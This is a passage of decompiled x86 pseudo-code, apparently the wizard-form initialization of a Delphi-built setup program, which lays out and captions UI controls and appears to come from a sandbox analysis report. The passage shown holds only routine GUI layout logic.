				intOrPtr* _t1872;
				struct HMENU__* _t1880;
				void* _t1881;
				void* _t1882;
				intOrPtr _t1883;
				signed int _t1884;
				void* _t1886;
				void* _t1887;
				intOrPtr _t1888;
				void* _t1894;
				intOrPtr _t1895;
				signed char _t1899;
				void* _t1906;
				void* _t1909;
				void* _t1912;
				void* _t1953;

				_t1953 = __fp0;
				_t1837 = __edi;
				_t1503 = __edx;
				_t1457 = __ecx;
				_t1886 = _t1887;
				_t1888 = _t1887 + 0xffffffc4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v48 = 0;
				_v64 = 0;
				_v24 = 0;
				if(__edx != 0) {
					_t1888 = _t1888 + 0xfffffff0;
					_t558 = E00402E78(_t558, _t1886);
				}
				_v16 = _t1457;
				_v9 = _t1503;
				_v8 = _t558;
				_t1456 =  &_v8;
				 *[fs:eax] = _t1888;
				E004203C4(_v16, 0); // executed
				 *((intOrPtr*)( *_t1456 + 0x2ec)) = E00402C78(1);
				 *((intOrPtr*)( *_t1456 + 0x32c)) = E00402C78(1);
				 *((intOrPtr*)( *_t1456 + 0x31c)) = E00402C78(1);
				 *((intOrPtr*)( *_t1456 + 0x320)) = E00402C78(1);
				 *((intOrPtr*)( *_t1456 + 0x324)) = E00402C78(1);
				 *((intOrPtr*)( *_t1456 + 0x328)) = E00402C78(1);
				_t574 =  *0x4ae208; // 0x21ec7a4
				_t1853 =  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x24c)) + 0x30)) -  *((intOrPtr*)( *_t574 + 0x1c))( *[fs:eax], 0x4625d0, _t1886);
				if(_t1853 > 0) {
					_t1445 =  *((intOrPtr*)( *_t1456 + 0x24c));
					E00414854( *((intOrPtr*)( *_t1456 + 0x24c)),  *((intOrPtr*)(_t1445 + 0x30)) - _t1853);
					_t1835 =  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x24c)) + 0x28));
					_t1884 = _t1853 >> 1;
					if( *((intOrPtr*)(_t1445 + 0x30)) - _t1853 < 0) {
						asm("adc esi, 0x0");
					}
					E00414814( *((intOrPtr*)( *_t1456 + 0x24c)), _t1835 + _t1884);
				}
				_t576 =  *0x4ae208; // 0x21ec7a4
				_t577 =  *((intOrPtr*)( *_t576 + 0x20))();
				_t1522 =  *((intOrPtr*)( *_t1456 + 0x24c));
				_t1855 =  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x24c)) + 0x2c)) - _t577;
				if(_t1855 > 0) {
					_t1894 =  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x24c)) + 0x2c)) - _t1855;
					E00414834( *((intOrPtr*)( *_t1456 + 0x24c)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x24c)) + 0x2c)) - _t1855);
					_t1832 =  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x24c)) + 0x24));
					_t1855 = _t1855 >> 1;
					if(_t1894 < 0) {
						asm("adc esi, 0x0");
					}
					_t1522 = _t1832 + _t1855;
					_t1895 = _t1832 + _t1855;
					E004147F4( *((intOrPtr*)( *_t1456 + 0x24c)));
				}
				E0048811C( *_t1456, _t1895);
				_t1896 =  *0x4ae17d & 0x00000001;
				if(( *0x4ae17d & 0x00000001) == 0) {
					E00488100( *_t1456, _t1522);
				} else {
					E00487FDC( *_t1456, 1,  *0x4adf90);
				}
				_t1459 =  *0x4ae1bc; // 0xc
				_t1523 =  *0x4ae194; // 0x21e62c8
				E00487BC8( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x230)) + 0x44)), _t1456, _t1459, _t1523, _t1837, _t1855, 0xc, 0);
				_t1524 =  *0x4625f0; // 0x1
				E0041A5E8( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x230)) + 0x44)), _t1524, _t1896);
				_t1525 =  *0x4625f0; // 0x1
				E0041A5E8( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x244)) + 0x44)), _t1525, _t1896);
				if(( *0x4ae17d & 0x00000001) == 0) {
					_t1459 =  &_v48;
					_t1526 =  *0x4ae278; // 0x21e49dc
					E00450C5C(0x99,  &_v48, _t1526);
					E00414D30( *_t1456, _t1456, _v48, _t1837, _t1855);
				} else {
					_t1828 =  *0x48ddc0; // 0x21eb5b8
					E00414D30( *_t1456, _t1456, _t1828, _t1837, _t1855);
				}
				if(( *0x4ae17d & 0x00000001) == 0) {
					_v36 = E004148D4( *_t1456);
					_v40 = E00414918( *_t1456);
					_t1899 =  *( *_t1456 + 0x110) |  *0x4625f4;
					E004211B0( *_t1456, _t1459,  *( *_t1456 + 0x110) |  *0x4625f4);
					E004211DC( *_t1456, 1);
					E00420D80( *_t1456, _v36);
					E00420DAC( *_t1456, _v40);
				}
				_v56 = 0xa;
				_v55 = 0xc;
				_v54 = 0xd;
				_v53 = 0xe;
				_v52 = 0x10;
				_t1856 = E00487F3C( *_t1456, _t1456, 4,  &_v56, _t1837, _t1855, _t1899);
				_v20 = E004881D8( *_t1456, 0xa);
				E00414834( *((intOrPtr*)( *_t1456 + 0x1bc)), _t1856);
				E00414834( *((intOrPtr*)( *_t1456 + 0x1b8)), _t1856);
				E00414834( *((intOrPtr*)( *_t1456 + 0x1b4)), _t1856);
				_t612 = E004148D4( *_t1456);
				_t62 =  &_v20; // 0x476e6f
				E004147F4( *((intOrPtr*)( *_t1456 + 0x1b4)));
				_t64 =  &_v20; // 0x476e6f
				E004147F4( *((intOrPtr*)( *_t1456 + 0x1b8)));
				_t1843 = _t612 -  *_t62 - _t1856 -  *_t64 - _t1856 - _t1856;
				E004147F4( *((intOrPtr*)( *_t1456 + 0x1bc)));
				_t1536 =  *0x4ae14c; // 0x400000
				E0045B700( *((intOrPtr*)( *_t1456 + 0x22c)), _t1536);
				E0045B718( *((intOrPtr*)( *_t1456 + 0x22c)));
				E0045B724( *((intOrPtr*)( *_t1456 + 0x22c)), 1);
				E0045B76C( *((intOrPtr*)( *_t1456 + 0x22c)), 0 | ( *0x4ae180 & 0x00000040) != 0x00000000);
				_t1540 =  *0x4ae14c; // 0x400000
				E0045B700( *((intOrPtr*)( *_t1456 + 0x260)), _t1540);
				E0045B718( *((intOrPtr*)( *_t1456 + 0x260)));
				E0045B724( *((intOrPtr*)( *_t1456 + 0x260)), 1);
				E0045B76C( *((intOrPtr*)( *_t1456 + 0x260)), 0 | ( *0x4ae180 & 0x00000040) != 0x00000000);
				_t1544 =  *0x4ae208; // 0x21ec7a4
				E0045B718( *((intOrPtr*)( *_t1456 + 0x24c)));
				_t1902 =  *0x4ae180 & 0x00000040;
				E0045B76C( *((intOrPtr*)( *_t1456 + 0x24c)), _t1544 & 0xffffff00 | ( *0x4ae180 & 0x00000040) != 0x00000000);
				_t652 =  *0x48d014; // 0x400000
				E0041D8C8( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2b8)) + 0xb4)), LoadBitmapA(_t652, "STOPIMAGE"));
				E0045B73C( *((intOrPtr*)( *_t1456 + 0x2b8)), 0xc0c0c0);
				E0045B754( *((intOrPtr*)( *_t1456 + 0x2b8)),  *((intOrPtr*)( *_t1456 + 0x48)));
				E00460D8C(_t1456, 4, _t612 -  *_t62 - _t1856 -  *_t64 - _t1856 - _t1856, _t1856,  *0x4ae180 & 0x00000040, _t1886); // executed
				E004627A4( *_t1456, 1,  *0x4ae180 & 0x00000040, 0, 0, 0);
				E004603D4(0xbd,  &_v48);
				E004036C4( &_v48, 0x46260c);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x230)), _t1456, _v48, _t612 -  *_t62 - _t1856 -  *_t64 - _t1856 - _t1856, _t1856);
				E0046070C( *((intOrPtr*)( *_t1456 + 0x1c8)),  *((intOrPtr*)( *_t1456 + 0x230)),  *0x4ae180 & 0x00000040);
				E0046073C( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x230)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x230)) + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x264)) + 0x28)),  *((intOrPtr*)( *_t1456 + 0x264)));
				E004603D4(0xbe,  &_v48);
				E004036C4( &_v48, 0x462618);
				_t1557 =  *0x48dbd8; // 0x21e9220
				E004036C4( &_v48, _t1557);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x264)), _t1456, _v48, _t612 -  *_t62 - _t1856 -  *_t64 - _t1856 - _t1856, _t1856);
				_t695 =  *0x48de80; // 0x21d388c
				_t696 =  *0x48dd00; // 0x21ea728
				E004627A4( *_t1456, 2,  *0x4ae180 & 0x00000040, _t696, _t695,  *((intOrPtr*)( *_t1456 + 0x1d4)));
				E004603D4(0x65,  &_v48);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x268)), _t1456, _v48, _t612 -  *_t62 - _t1856 -  *_t64 - _t1856 - _t1856, _t1856);
				E0046073C(E0046070C( *((intOrPtr*)( *_t1456 + 0x1cc)),  *((intOrPtr*)( *_t1456 + 0x268)),  *0x4ae180 & 0x00000040),  *((intOrPtr*)( *_t1456 + 0x26c)));
				_t1564 =  *0x48dcfc; // 0x21ea704
				E00414D30( *((intOrPtr*)( *_t1456 + 0x2a0)), _t1456, _t1564, _t612 -  *_t62 - _t1856 -  *_t64 - _t1856 - _t1856, _t707);
				_t1565 =  *0x48dd08; // 0x21ea808
				E00414D30( *((intOrPtr*)( *_t1456 + 0x2a4)), _t1456, _t1565, _t612 -  *_t62 - _t1856 -  *_t64 - _t1856 - _t1856, _t707);
				_t719 =  *0x48de84; // 0x21d38ac
				_t720 =  *0x48dd3c; // 0x21eabdc
				E004627A4( *_t1456, 3,  *0x4ae180 & 0x00000040, _t720, _t719,  *((intOrPtr*)( *_t1456 + 0x1d8)));
				_t1567 =  *0x48dd40; // 0x21eac14
				E00414D30( *((intOrPtr*)( *_t1456 + 0x214)), _t1456, _t1567, _t612 -  *_t62 - _t1856 -  *_t64 - _t1856 - _t1856, _t707);
				_t1568 =  *0x48dd38; // 0x21eabc4
				E00414D30( *((intOrPtr*)( *_t1456 + 0x21c)), _t1456, _t1568, _t1843, _t707);
				E00414814( *((intOrPtr*)( *_t1456 + 0x21c)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x21c)) + 0x28)) + E0046070C( *((intOrPtr*)( *_t1456 + 0x1cc)),  *((intOrPtr*)( *_t1456 + 0x214)), _t1902));
				E00414814( *((intOrPtr*)( *_t1456 + 0x218)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x218)) + 0x28)) + _t732 + E0046070C( *((intOrPtr*)( *_t1456 + 0x1cc)),  *((intOrPtr*)( *_t1456 + 0x21c)), _t1902));
				_t744 =  *0x48de78; // 0x21ebfe0
				_t745 =  *0x48dcd4; // 0x21ea45c
				E004627A4( *_t1456, 4, _t1902, _t745, _t744,  *((intOrPtr*)( *_t1456 + 0x1dc)));
				_t1576 =  *0x48dcd0; // 0x21ea418
				E00414D30( *((intOrPtr*)( *_t1456 + 0x238)), _t1456, _t1576, _t1843, _t732 + E0046070C( *((intOrPtr*)( *_t1456 + 0x1cc)),  *((intOrPtr*)( *_t1456 + 0x21c)), _t1902));
				E0046073C(E0046070C( *((intOrPtr*)( *_t1456 + 0x1cc)),  *((intOrPtr*)( *_t1456 + 0x238)), _t1902),  *((intOrPtr*)( *_t1456 + 0x234)));
				_t760 =  *0x48dea4; // 0x21ec03c
				_t761 =  *0x48de50; // 0x21ebe3c
				_t1471 =  *((intOrPtr*)( *_t1456 + 0x1cc));
				E004627A4( *_t1456, 5, _t1902, _t761, _t760,  *((intOrPtr*)( *_t1456 + 0x1e0)));
				_t1580 =  *0x48de54; // 0x21ebe68
				E00414D30( *((intOrPtr*)( *_t1456 + 0x2a8)), _t1456, _t1580, _t1843, _t754);
				_t1861 = E0046070C( *((intOrPtr*)( *_t1456 + 0x1cc)),  *((intOrPtr*)( *_t1456 + 0x2a8)), _t1902);
				E00414814( *((intOrPtr*)( *_t1456 + 0x2ac)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2ac)) + 0x28)) + _t1861);
				E00414814( *((intOrPtr*)( *_t1456 + 0x2b0)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2b0)) + 0x28)) + _t1861);
				_t1586 =  *0x48de5c; // 0x21ebea4
				E00414D30( *((intOrPtr*)( *_t1456 + 0x2b0)), _t1456, _t1586, _t1843, _t1861);
				_t1862 = _t1861 + E0046070C( *((intOrPtr*)( *_t1456 + 0x1cc)),  *((intOrPtr*)( *_t1456 + 0x2b0)), _t1902);
				E00414814( *((intOrPtr*)( *_t1456 + 0x2b4)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2b4)) + 0x28)) + _t1862);
				_t1903 =  *0x4ae255;
				if( *0x4ae255 == 0) {
					E00414C5C( *((intOrPtr*)( *_t1456 + 0x2c4)), _t1471, 0, _t1843);
					__eflags = 0;
					E00414C5C( *((intOrPtr*)( *_t1456 + 0x2c8)), _t1471, 0, _t1843);
				} else {
					E00414814( *((intOrPtr*)( *_t1456 + 0x2c4)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2c4)) + 0x28)) + _t1862);
					_t1819 =  *0x48de60; // 0x21ebec0
					E00414D30( *((intOrPtr*)( *_t1456 + 0x2c4)), _t1456, _t1819, _t1843, _t1862);
					E00414814( *((intOrPtr*)( *_t1456 + 0x2c8)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2c8)) + 0x28)) + _t1862);
				}
				_t794 =  *0x48de90; // 0x21d3908
				E004603D4(0x87,  &_v48);
				E004627A4( *_t1456, 6, _t1903, _v48, _t794,  *((intOrPtr*)( *_t1456 + 0x1e4)));
				E004603D4(0x89,  &_v48);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x290)), _t1456, _v48, _t1843, _t1862);
				_t807 = E004881D8( *_t1456, 0xc);
				_t1863 =  *((intOrPtr*)( *_t1456 + 0x2dc));
				_t1845 = _t807 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x24)) +  *((intOrPtr*)(_t1863 + 0x2c));
				_t1864 =  *((intOrPtr*)( *_t1456 + 0x290));
				_t1473 =  *((intOrPtr*)(_t1864 + 0x28));
				_t1865 =  *_t1864;
				 *((intOrPtr*)( *_t1864 + 0x4c))( *((intOrPtr*)(_t1864 + 0x30)),  *((intOrPtr*)(_t1864 + 0x2c)) - _t807 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x24)) +  *((intOrPtr*)(_t1863 + 0x2c)) -  *((intOrPtr*)(_t1864 + 0x24)));
				E0046070C( *((intOrPtr*)(_t1864 + 0x28)),  *((intOrPtr*)( *_t1456 + 0x290)), _t1903);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x30)) >  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x290)) + 0x30))) {
					_t1814 =  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x290)) + 0x30)) - 1;
					_t1815 = _t1814 >> 1;
					if(_t1814 < 0) {
						asm("adc edx, 0x0");
					}
					_t1906 = _t1815 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x290)) + 0x28));
					E00414814( *((intOrPtr*)( *_t1456 + 0x290)), _t1815 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x290)) + 0x28)));
				}
				E004603D4(0x86,  &_v48);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x2e4)), _t1456, _v48, _t1845, _t1865);
				_push(E004881E8( *_t1456, 0xd) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x290)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x290)) + 0x30)) - 1);
				_t832 = E004881E8( *_t1456, 0xc);
				_pop(_t1614);
				E00414814( *((intOrPtr*)( *_t1456 + 0x2e4)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e4)) + 0x28)) + E0042E79C(_t832 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x30)), _t1614) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e4)) + 0x28)));
				E00414814( *((intOrPtr*)( *_t1456 + 0x208)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x208)) + 0x28)) + E0042E79C(_t832 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x30)), _t1614) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e4)) + 0x28)) + E0046070C(_t1473,  *((intOrPtr*)( *_t1456 + 0x2e4)), _t1906));
				_t1622 =  *0x48dbc0; // 0x21e914c
				E00414D30( *((intOrPtr*)( *_t1456 + 0x2d4)), _t1456, _t1622,  *((intOrPtr*)( *_t1456 + 0x290)), E0042E79C(_t832 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x30)), _t1614) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e4)) + 0x28)) + E0046070C(_t1473,  *((intOrPtr*)( *_t1456 + 0x2e4)), _t1906));
				_v60 = 0x14;
				_t851 = E00487F3C( *_t1456, _t1456, 0,  &_v60,  *((intOrPtr*)( *_t1456 + 0x290)), E0042E79C(_t832 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x30)), _t1614) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e4)) + 0x28)) + E0046070C(_t1473,  *((intOrPtr*)( *_t1456 + 0x2e4)), _t1906), _t1906);
				_t1847 = _t851;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2d4)))) + 0x4c))( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2d4)) + 0x30)), _t851);
				E00414834( *((intOrPtr*)( *_t1456 + 0x208)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2d4)) + 0x24)) - E004881D8( *_t1456, 0xa) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x208)) + 0x24)));
				E004603D4(0x29,  &_v48);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x204)), _t1456, _v48, _t851,  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2d4)))));
				E00414814( *((intOrPtr*)( *_t1456 + 0x204)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x204)) + 0x28)) - E0046070C( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2d4)) + 0x28)) + E0042E79C(_t832 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2dc)) + 0x30)), _t1614) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e4)) + 0x28)) + E0046070C(_t1473,  *((intOrPtr*)( *_t1456 + 0x2e4)), _t1906),  *((intOrPtr*)( *_t1456 + 0x204)), _t1906));
				_t883 =  *0x48de94; // 0x21d3930
				E004603D4(0x84,  &_v48);
				E004627A4( *_t1456, 7, _t1906, _v48, _t883,  *((intOrPtr*)( *_t1456 + 0x1e8)));
				E004603D4(0x85,  &_v48);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x298)), _t1456, _v48, _t851,  *((intOrPtr*)( *_t1456 + 0x204)));
				_t1871 = E0046070C( *((intOrPtr*)( *_t1456 + 0x1cc)),  *((intOrPtr*)( *_t1456 + 0x298)), _t1906);
				E00414814( *((intOrPtr*)( *_t1456 + 0x224)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x224)) + 0x28)) + _t1871);
				_t1478 = _t1871;
				E0046073C(_t1871,  *((intOrPtr*)( *_t1456 + 0x278)));
				E004603D4(0x1e,  &_v48);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x27c)), _t1456, _v48, _t851, _t1871);
				E0046070C(_t1871,  *((intOrPtr*)( *_t1456 + 0x27c)), _t1906);
				if( *0x4ae25a != 0) {
					_t1379 =  *0x4ae1d0; // 0x21d2a88
					if( *((intOrPtr*)(_t1379 + 8)) == 1) {
						E00414C5C( *((intOrPtr*)( *_t1456 + 0x224)), _t1478, 0, _t1847);
						_t1909 =  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x224)) + 0x28)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x278)) + 0x28));
						E0046073C( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x224)) + 0x28)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x278)) + 0x28)),  *((intOrPtr*)( *_t1456 + 0x278)));
					}
				}
				_t916 =  *0x48de98; // 0x21d3950
				E004603D4(0x8e,  &_v48);
				E004627A4( *_t1456, 8, _t1909, _v48, _t916,  *((intOrPtr*)( *_t1456 + 0x1ec)));
				E004603D4(0x8f,  &_v48);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x294)), _t1456, _v48, _t1847, _t1871);
				_t929 = E004881D8( *_t1456, 0xc);
				_t1849 = _t929 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x24)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x2c));
				_t1872 =  *((intOrPtr*)( *_t1456 + 0x294));
				_t1873 =  *_t1872;
				 *((intOrPtr*)( *_t1872 + 0x4c))( *((intOrPtr*)(_t1872 + 0x30)),  *((intOrPtr*)(_t1872 + 0x2c)) - _t929 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x24)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x2c)) -  *((intOrPtr*)(_t1872 + 0x24)));
				E0046070C( *((intOrPtr*)(_t1872 + 0x28)),  *((intOrPtr*)( *_t1456 + 0x294)), _t1909);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x30)) >  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x294)) + 0x30))) {
					_t1808 =  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x294)) + 0x30)) - 1;
					_t1809 = _t1808 >> 1;
					if(_t1808 < 0) {
						asm("adc edx, 0x0");
					}
					_t1912 = _t1809 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x294)) + 0x28));
					E00414814( *((intOrPtr*)( *_t1456 + 0x294)), _t1809 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x294)) + 0x28)));
				}
				E004603D4(0x8d,  &_v48);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x2e8)), _t1456, _v48, _t1849, _t1873);
				_push(E004881E8( *_t1456, 0xd) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x294)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x294)) + 0x30)) - 1);
				_t955 = E004881E8( *_t1456, 0xc);
				_pop(_t1675);
				E00414814( *((intOrPtr*)( *_t1456 + 0x2e8)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e8)) + 0x28)) + E0042E79C(_t955 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x30)), _t1675) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e8)) + 0x28)));
				E00414814( *((intOrPtr*)( *_t1456 + 0x20c)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x20c)) + 0x28)) + E0042E79C(_t955 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x30)), _t1675) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e8)) + 0x28)) + E0046070C( *((intOrPtr*)( *_t1456 + 0x2e0)),  *((intOrPtr*)( *_t1456 + 0x2e8)), _t1912));
				_t1681 =  *0x48dbc0; // 0x21e914c
				E00414D30( *((intOrPtr*)( *_t1456 + 0x2d8)), _t1456, _t1681, _t1849, E0042E79C(_t955 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x30)), _t1675) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e8)) + 0x28)) + E0046070C( *((intOrPtr*)( *_t1456 + 0x2e0)),  *((intOrPtr*)( *_t1456 + 0x2e8)), _t1912));
				_v60 = 0x14;
				_t977 = E00487F3C( *_t1456, _t1456, 0,  &_v60, _t1849, E0042E79C(_t955 +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e0)) + 0x30)), _t1675) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2e8)) + 0x28)) + E0046070C( *((intOrPtr*)( *_t1456 + 0x2e0)),  *((intOrPtr*)( *_t1456 + 0x2e8)), _t1912), _t1912);
				_t1850 = _t977;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2d8)))) + 0x4c))( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2d8)) + 0x30)), _t977);
				E00414834( *((intOrPtr*)( *_t1456 + 0x20c)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2d8)) + 0x24)) - E004881D8( *_t1456, 0xa) -  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x20c)) + 0x24)));
				_t1692 =  *0x48dd18; // 0x21ea938
				E00414D30( *((intOrPtr*)( *_t1456 + 0x210)), _t1456, _t1692, _t977,  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2d8)))));
				_t1002 =  *0x48de9c; // 0x21ebff8
				E004603D4(0x90,  &_v48);
				E004627A4( *_t1456, 9, _t1912, _v48, _t1002,  *((intOrPtr*)( *_t1456 + 0x1f0)));
				E004603D4(0x91,  &_v48);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x29c)), _t1456, _v48, _t977,  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2d8)))));
				E0046073C(E0046070C( *((intOrPtr*)( *_t1456 + 0x1cc)),  *((intOrPtr*)( *_t1456 + 0x29c)), _t1912),  *( *_t1456 + 0x2cc));
				E0042BDE8( *( *_t1456 + 0x2cc), 0);
				 *((intOrPtr*)( *( *_t1456 + 0x2cc) + 0x154)) = E004881E8( *_t1456, 0x16);
				_t1913 =  *0x4ae180 & 0x00000010;
				E0044E7D4( *( *_t1456 + 0x2cc),  *( *_t1456 + 0x2cc) & 0xffffff00 | ( *0x4ae180 & 0x00000010) != 0x00000000);
				_t1030 =  *0x48de8c; // 0x21d38e8
				E004603D4(0x79,  &_v48);
				E004627A4( *_t1456, 0xa,  *0x4ae180 & 0x00000010, _v48, _t1030,  *((intOrPtr*)( *_t1456 + 0x1f4)));
				_t1039 =  *0x48de88; // 0x21d38c4
				E004603D4(0x77,  &_v48);
				E004627A4( *_t1456, 0xb,  *0x4ae180 & 0x00000010, _v48, _t1039,  *((intOrPtr*)( *_t1456 + 0x1f8)));
				_t1048 =  *0x48de7c; // 0x21d3874
				E004603D4(0x5b,  &_v48);
				E004627A4( *_t1456, 0xc,  *0x4ae180 & 0x00000010, _v48, _t1048,  *((intOrPtr*)( *_t1456 + 0x1fc)));
				_t1057 =  *0x48de74; // 0x21d2d74
				_t1058 =  *0x48dccc; // 0x21ea3c8
				E004627A4( *_t1456, 0xd,  *0x4ae180 & 0x00000010, _t1058, _t1057,  *((intOrPtr*)( *_t1456 + 0x200)));
				_t1711 =  *0x48dcc8; // 0x21ea384
				E00414D30( *((intOrPtr*)( *_t1456 + 0x274)), _t1456, _t1711, _t977, _t1016);
				E0046073C(E0046070C( *((intOrPtr*)( *_t1456 + 0x1cc)),  *((intOrPtr*)( *_t1456 + 0x274)),  *0x4ae180 & 0x00000010),  *((intOrPtr*)( *_t1456 + 0x270)));
				E004627A4( *_t1456, 0xe,  *0x4ae180 & 0x00000010, 0, 0, 0);
				_t1496 =  *0x4ae1bc; // 0xc
				_t1715 =  *0x4ae194; // 0x21e62c8
				E00487BC8( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2c0)) + 0x44)), _t1456, _t1496, _t1715, _t977, _t1067, 0xc, 0);
				_t1716 =  *0x4625f0; // 0x1
				E0041A5E8( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2c0)) + 0x44)), _t1716, _t1913);
				E004603D4(0x4e,  &_v48);
				_push( &_v48);
				_pop(_t1085);
				E004036C4(_t1085, 0x46260c);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x2c0)), _t1456, _v48, _t977, _t1067);
				E0046070C(_t1496,  *((intOrPtr*)( *_t1456 + 0x2c0)), _t1913);
